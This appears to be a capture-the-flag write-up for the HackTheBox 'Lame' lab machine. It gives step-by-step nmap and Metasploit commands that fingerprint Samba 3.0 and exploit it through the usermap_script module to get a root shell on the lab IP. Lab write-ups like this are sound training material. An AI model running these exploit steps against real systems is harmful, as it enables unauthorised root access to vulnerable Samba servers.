Hackthebox – Lame Writeup
Hackthebox – Lame Writeup
Today we are gonna solve the Lame machine from hackthebox. Lame is a Linux machine released on 14 March 2017. In the difficulty level, it is rated as an easy machine. We exploit a vulnerability in the smb port to gain direct root access. Let’s get started.
Connecting to HTB Vpn:
1. First download the vpn file from the access page of hackthebox.eu
2. Open the .ovpn file in your terminal with the following command
openvpn yourname.ovpn
3. Now as the “Initialization Completed” message appears on the screen you are connected to the hackthebox network
Scanning:
1. Let’s begin by performing a nmap scan our target at 10.10.10.3
nmap -sV -A -p- –script vuln 10.10.10.3
-sV : to get the service versions on each port
-A : to get information such as os details, traceroutes, ports etc
-p- : to scan all 65535 ports
–script vuln : to check for most common vulnerabilities
We get the following details from our scan
Certified Ethical Hacking
Enumeration:
1. From the nmap result there is a smb open port running samba smbd 3.x
2. But we don’t know the version of the service. Metasploit has an auxiliary module to find out smb versions, so let’s use that
msfconsole
3. Search for smb_version
search smb_version
4. Select the exploit
use auxiliary/scanner/smb/smb_version
5. View the options needed to be set using the show options command
show options
6. We have to set the rhosts as the remote machine’s IP
set rhosts 10.10.10.3
7. And now we run the exploit
exploit
8. From the results we got that the smb port is running samba 3.0
9. So let’s search in google for exploits on samba smb 3.0. After some searching we got to know that there is a metasploit module called usermap script which can be used to exploit samba smb 3.0.
Gaining access:
1. Search for usermap_script
search usermap_script
2. Select our exploit from the list by specifying the path
use exploit/multi/samba/usermap_script
3. View the options needed to be set using the show options command
show options
4. We have to set the rhosts to the remote machine address
set rhosts 10.10.10.3
5. Now lets exploit the machine
exploit
6. Ta da, we got a meterpreter shell
7. Let’s check who we are on the system
whoami
We are root !!!!
Don’t forget to check out our latest Blogs – HackTheBox Legacy Writeup